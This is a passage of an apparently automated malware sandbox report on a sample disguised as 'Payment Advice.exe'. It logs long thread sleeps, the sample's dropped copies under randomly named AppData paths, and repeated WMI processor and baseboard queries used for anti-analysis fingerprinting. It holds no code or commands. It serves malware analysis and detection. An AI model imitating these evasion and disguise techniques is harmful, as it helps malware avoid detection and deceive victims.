                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -95000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -94891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -94781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -94672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -94562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -94453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604Thread sleep time: -94344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep count: 39 > 30
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7916Thread sleep count: 2012 > 30
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7916Thread sleep count: 7837 > 30
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99545s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98996s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98780s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98117s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -98015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97796s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97466s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97249s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97139s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -97030s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96921s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96702s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96374s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -96044s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -95937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -95812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -93076s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92965s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92858s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92744s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92530s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92421s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92292s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92148s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -92035s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912Thread sleep time: -91912s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7980Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -36893488147419080s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99827s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99718s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99498s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99390s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -99062s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98624s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98515s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98296s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98186s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -98078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97968s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97749s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97421s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -97093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96655s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -96000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95779s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -95015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -94906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -94797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -94687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244Thread sleep time: -94578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7356Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep count: 39 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 5752Thread sleep count: 3599 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 5752Thread sleep count: 6220 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95113s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94619s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94268s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -1199958s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -1199828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -1199719s >= -30000s
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
